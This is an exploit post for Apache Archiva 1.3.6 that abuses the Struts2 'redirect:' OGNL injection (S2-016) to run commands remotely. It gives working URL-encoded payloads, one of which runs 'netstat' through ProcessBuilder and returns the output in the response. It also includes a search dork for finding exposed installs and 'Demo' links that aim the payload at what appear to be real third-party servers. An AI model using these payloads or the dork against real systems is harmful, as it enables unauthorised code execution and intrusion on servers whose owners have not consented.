Apache Archiva 1.3.6 => Remote Command Execution
####################################################################
Author: Kacper
Contact: info[at]devilteam.pl
Home Page: https://devilteam.pl/
####################################################################
Vendor: http://archiva.apache.org/
Dork: "Apache Archiva \ Browse Repository"
Description:
Apache Archiva use Apache Struts2:
"In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code."
In Apache Archiva can be use parameter redirect: for OGNL injection.
PoC:
(print devilteam.pl) http://imageshack.com/a/img163/6865/e88n.png
http://127.0.0.1:8080/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27
com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println
%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}
{execute netstat) http://imageshack.com/a/img843/1662/0r84.png
http://127.0.0.1:8080/archiva/security/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder
%28new%20java.lang.String[]{%27netstat%27}%29%29.start%28%29,%23b%3d%23a.
getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,
%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],
%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2
.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,
%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}
Demo:
http://archiva.eionet.eurXpa.eu/security/login.action?redirect:${%23w%3d%23context.get
%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter
%28%29,%23w.println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}
http://community.ucs.indiXna.edu:9090/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.
println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}
Cheers:
cxsecurity.com
Bartek (ZUOO)
and all people from devilteam.pl
Reference:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
https://devilteam.pl/viewtopic.php?p=43506